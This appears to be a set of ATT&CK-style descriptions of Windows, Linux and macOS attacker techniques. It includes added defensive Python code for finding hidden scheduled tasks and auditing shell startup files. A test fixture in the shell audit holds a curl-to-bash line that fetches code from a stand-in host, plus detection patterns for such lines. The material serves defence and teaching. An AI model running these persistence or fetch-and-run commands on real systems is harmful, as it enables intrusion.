Extra Window Memory Injection

Adversaries may inject malicious code into processes via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.

Before creating a window, graphical Windows-based processes must prescribe to or register a window class, which stipulates appearance and behavior (via windows procedures, which are functions that handle input/output of data). [Microsoft Window Class] Registration of new windows classes can include a request for up to 40 bytes of EWM to be appended to the allocated memory of each instance of that class. This EWM is intended to store data specific to that window and has specific application programming interface (API) functions to set and get its value. [Microsoft GetWindowLong function] [Microsoft SetWindowLong function]

Although small, the EWM is large enough to store a 32-bit pointer and is often used to point to a windows procedure. Malware may possibly utilize this memory location as part of an attack chain that includes writing code to shared sections of the process's memory, placing a pointer to the code in EWM, then invoking execution by returning execution control to the address in the process's EWM.

Execution granted through EWM injection may allow access to both the target process's memory and possibly elevated privileges. Writing payloads to shared sections also avoids the use of highly monitored API calls such as WriteProcessMemory and CreateRemoteThread. [Elastic Process Injection July 2017] More sophisticated malware samples may also potentially bypass protection mechanisms such as data execution prevention (DEP) by triggering a combination of windows procedures and other system functions that will rewrite the malicious payload inside an executable portion of the target process. [MalwareTech Power Loader Aug 2013] [WeLiveSecurity Gapz and Redyms Mar 2013]

Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via EWM injection may also evade detection from security products since the execution is masked under a legitimate process.
Scheduled Task

Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The schtasks utility can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively adversaries have used the Windows netapi32 library to create a scheduled task.

The deprecated at utility could also be abused by adversaries (ex: At), though at.exe can not access tasks created with schtasks or the Control Panel.

An adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and/or to run a process under the context of a specified account (such as SYSTEM). Similar to System Binary Proxy Execution, adversaries have also abused the Windows Task Scheduler to potentially mask one-time execution under signed/trusted system processes. [ProofPoint Serpent]

Adversaries may also create "hidden" scheduled tasks (i.e. Hide Artifacts) that may not be visible to defender tools and manual queries used to enumerate tasks. Specifically, an adversary may hide a task from schtasks /query and the Task Scheduler by deleting the associated Security Descriptor (SD) registry value (where deletion of this value must be completed using SYSTEM permissions). [SigmaHQ] [Tarrask scheduled task] Adversaries may also employ alternate methods to hide tasks, such as altering the metadata (e.g., Index value) within associated registry keys. [Defending Against Scheduled Task Attacks in Windows Environments]
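The SD-deletion trick described above gives defenders a concrete cross-check: a task that is present under the TaskCache\Tree registry key but missing its SD value, or absent from schtasks /query, deserves a look. The following is an added defensive example (not from the page's sources or any named tool) that runs that comparison offline against a constructed registry snapshot and constructed schtasks CSV output; the task names, GUIDs and SD bytes are made up, and a real collector would populate the dictionary by walking the key with winreg.

```python
import csv
import io
from typing import Dict, List, Set

# Constructed snapshot of HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree:
# task path -> values under that key (Id and SD only; the GUIDs and SD bytes are made up).
SAMPLE_TREE: Dict[str, Dict[str, object]] = {
    r"\Microsoft\Windows\Defrag\ScheduledDefrag": {"Id": "{GUID-1}", "SD": b"\x01\x00\x04\x80"},
    r"\Updater": {"Id": "{GUID-2}", "SD": b"\x01\x00\x04\x80"},
    r"\Maintenance\Cleanup": {"Id": "{GUID-3}"},  # SD value deleted, as in the Tarrask case
}

# Constructed output of: schtasks /query /fo CSV /nh  (TaskName is the first column).
SAMPLE_SCHTASKS_CSV = (
    '"\\Microsoft\\Windows\\Defrag\\ScheduledDefrag","N/A","Ready"\r\n'
    '"\\Updater","3/1/2024 9:00:00 AM","Ready"\r\n'
)

def parse_schtasks_csv(text: str) -> Set[str]:
    """Return the set of task names that schtasks /query reports."""
    return {row[0] for row in csv.reader(io.StringIO(text)) if row}

def find_hidden_tasks(tree: Dict[str, Dict[str, object]], visible: Set[str]) -> List[Dict[str, str]]:
    """Cross-check TaskCache\\Tree entries against the schtasks listing and report mismatches."""
    findings = []
    for path, values in tree.items():
        reasons = []
        if "SD" not in values:
            reasons.append("SD value missing (task hidden from schtasks /query and the Task Scheduler UI)")
        if path not in visible:
            reasons.append("present in TaskCache\\Tree but not listed by schtasks")
        if reasons:
            findings.append({"task": path, "id": str(values.get("Id", "")), "reason": "; ".join(reasons)})
    return findings

if __name__ == "__main__":
    for f in find_hidden_tasks(SAMPLE_TREE, parse_schtasks_csv(SAMPLE_SCHTASKS_CSV)):
        print(f["task"], f["id"], "->", f["reason"])
```

Because the SD value can only be removed with SYSTEM permissions, any hit here also implies the host has already seen a privilege escalation.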
Socket Filters

Adversaries may attach filters to a network socket to monitor and then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the libpcap library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). If the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.

To establish a connection, an adversary sends a crafted packet to the targeted host that matches the installed filter criteria. [haking9 libpcap network sniffing] Adversaries have used socket filters to trigger the installation of implants, conduct ping backs, and invoke command shells. Communication with these socket filters may also be used in conjunction with Protocol Tunneling. [exatrack bpf filters passive backdoors] [Leonardo Turla Penquin 2020]

Filters can be installed on any Unix-like platform with libpcap installed, or on Windows hosts using Winpcap. Adversaries may use either libpcap with pcap_setfilter or the standard library function setsockopt with the SO_ATTACH_FILTER option. Since the socket connection is not active until a packet is received, this behavior may be difficult to detect due to the lack of activity on the host, low CPU overhead, and limited visibility into raw socket usage.
Indicator Removal from Tools

If a malicious tool is detected and quarantined or otherwise curtailed, an adversary may be able to determine why the malicious tool was detected (the indicator), modify the tool by removing the indicator, and use the updated version that is no longer detected by the target's defensive systems or by subsequent targets that use similar systems.

A good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may use Software Packing or otherwise modify the file so that it has a different signature, and then re-use the malware.
Archive via Utility

Adversaries may use utilities to compress and/or encrypt collected data prior to exfiltration. Many utilities include functionality to compress, encrypt, or otherwise package data into a format that is easier/more secure to transport.

Adversaries may abuse various utilities to compress or encrypt data before exfiltration. Some third party utilities may be preinstalled, such as tar on Linux and macOS or zip on Windows systems.

On Windows, diantz or makecab may be used to package collected files into a cabinet (.cab) file. diantz may also be used to download and compress files from remote locations (i.e. Remote Data Staging). [diantz.exe_lolbas] Additionally, xcopy on Windows can copy files and directories with a variety of options. Adversaries may also use third party utilities, such as 7-Zip, WinRAR, and WinZip, to perform similar activities. [7zip Homepage] [WinRAR Homepage] [WinZip Homepage]
VNC

Adversaries may use Valid Accounts to remotely control machines using Virtual Network Computing (VNC). VNC is a platform-independent desktop sharing system that uses the RFB ("remote framebuffer") protocol to enable users to remotely control another computer's display by relaying the screen, mouse, and keyboard inputs over the network.

VNC differs from Remote Desktop Protocol in that VNC is screen-sharing software rather than resource-sharing software. By default, VNC uses the system's authentication, but it can be configured to use credentials specific to VNC. [macOS VNC software for Remote Desktop] [VNC Authentication]

Adversaries may abuse VNC to perform malicious actions as the logged-on user, such as opening documents, downloading files, and running arbitrary commands. An adversary could use VNC to remotely control and monitor a system to collect data and information to pivot to other systems within the network. Specific VNC libraries/implementations have also been susceptible to brute force attacks and memory usage exploitation. [Hijacking VNC] [macOS root VNC login without auth] [VNC Vulnerabilities] [Offensive Security VNC Authentication Check] [Attacking VNC Servers PentestLab] [Havana authentication bug]
Windows Management Instrumentation

Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM). [MSDN WMI] Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS. [MSDN WMI] [FireEye WMI 2015]

An adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for Discovery as well as remote Execution of files as part of Lateral Movement. [FireEye WMI SANS 2015] [FireEye WMI 2015]
Malicious Shell Modification

Adversaries may establish persistence through executing malicious commands triggered by a user's shell. User Unix Shells execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system (/etc) and the user's home directory (~/) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their current user and are often used to set environment variables, create aliases, and customize the user's environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately.

Adversaries may attempt to establish persistence by inserting commands into scripts automatically executed by shells. Using bash as an example, the default shell for most GNU/Linux systems, adversaries may add commands that launch malicious binaries into the /etc/profile and /etc/profile.d files. [intezer-kaiji-malware] These files typically require root permissions to modify and are executed each time any shell on a system launches. For user level permissions, adversaries can insert malicious commands into ~/.bash_profile, ~/.bash_login, or ~/.profile, which are sourced when a user opens a command-line interface or connects remotely. [Rocke] Since the system only executes the first existing file in the listed order, adversaries have used ~/.bash_profile to ensure execution. Adversaries have also leveraged the ~/.bashrc file, which is additionally executed if the connection is established remotely or an additional interactive shell is opened, such as a new tab in the command-line interface. [Tsunami] [Rocke] [Linux Rabbit] [Magento] Some malware targets the termination of a program to trigger execution [Cannon]; adversaries can use the ~/.bash_logout file to execute malicious commands at the end of a session. [Pearl_shellbot]

For macOS, the functionality of this technique is similar but may leverage zsh, the default shell for macOS 10.15+. When Terminal.app is opened, the application launches a zsh login shell and a zsh interactive shell. The login shell configures the system environment using /etc/profile, /etc/zshenv, /etc/zprofile, and /etc/zlogin. The login shell then configures the user environment with ~/.zprofile and ~/.zlogin. The interactive shell uses ~/.zshrc to configure the user environment. Upon exiting, /etc/zlogout and ~/.zlogout are executed. For legacy programs, macOS executes /etc/bashrc on startup.
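Two points from the passage above are worth turning into a check: bash sources only the first of ~/.bash_profile, ~/.bash_login and ~/.profile that exists, and the usual persistence entries are lines that launch something from a world-writable directory, pipe a download into a shell, or background a process. The following is an added defensive example, not code from the page's sources; the heuristics, the file contents and the host names are constructed by me for illustration, and a real audit would read the files from disk instead of the embedded mapping.

```python
import re
from typing import List, Optional, Set, Tuple

# Per-user login files in the order bash tries them; only the first existing one is sourced.
BASH_LOGIN_FILES = ("~/.bash_profile", "~/.bash_login", "~/.profile")

# Constructed heuristics for auditing startup scripts (my own, not from the page's sources).
SUSPICIOUS = [
    (re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(ba|z|da)?sh\b"), "download piped into a shell"),
    (re.compile(r"(^|[\s;&|(])(/tmp|/dev/shm|/var/tmp)/\S+"), "executable under a world-writable directory"),
    (re.compile(r"\b(nohup|setsid)\b|&\s*$"), "backgrounded or detached command in a startup script"),
    (re.compile(r"base64\s+(-d|--decode)\b"), "base64-decoded payload"),
    (re.compile(r"^\s*(source|\.)\s+(/tmp|/dev/shm|~/\.[^/\s]+/)"), "sourcing a file from an unusual location"),
]

def selected_login_file(existing: Set[str]) -> Optional[str]:
    """Return the per-user login file bash will actually source, given which ones exist."""
    for candidate in BASH_LOGIN_FILES:
        if candidate in existing:
            return candidate
    return None

def audit_startup_script(path: str, text: str) -> List[Tuple[str, int, str]]:
    """Flag each non-comment line of one startup script that matches a suspicious pattern."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        for pattern, reason in SUSPICIOUS:
            if pattern.search(line):
                findings.append((path, lineno, reason))
                break  # one finding per line is enough for triage
    return findings

# Constructed sample: a benign /etc/profile.d script and a tampered ~/.bash_profile.
SAMPLE_FILES = {
    "/etc/profile.d/lang.sh": "export LANG=en_US.UTF-8\nalias ll='ls -l'\n",
    "~/.bash_profile": (
        "# .bash_profile\n"
        "[ -f ~/.bashrc ] && . ~/.bashrc\n"
        "export PATH=$HOME/bin:$PATH\n"
        "nohup /dev/shm/.x/update >/dev/null 2>&1 &\n"
        "curl -s http://example.invalid/a | bash\n"
    ),
}

def audit_all(files=SAMPLE_FILES) -> List[Tuple[str, int, str]]:
    """Audit every file in the mapping and concatenate the findings."""
    return [f for path, text in files.items() for f in audit_startup_script(path, text)]
```

On a live host, compare the flagged lines against a known-good baseline of the same files, since distribution defaults and legitimate environment tweaks will dominate the benign output.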
Screen Capture

Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as CopyFromScreen, xwd, or screencapture. [CopyFromScreen .NET] [Antiquated Mac Malware]
Bootkit

A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). [MTrends 2016]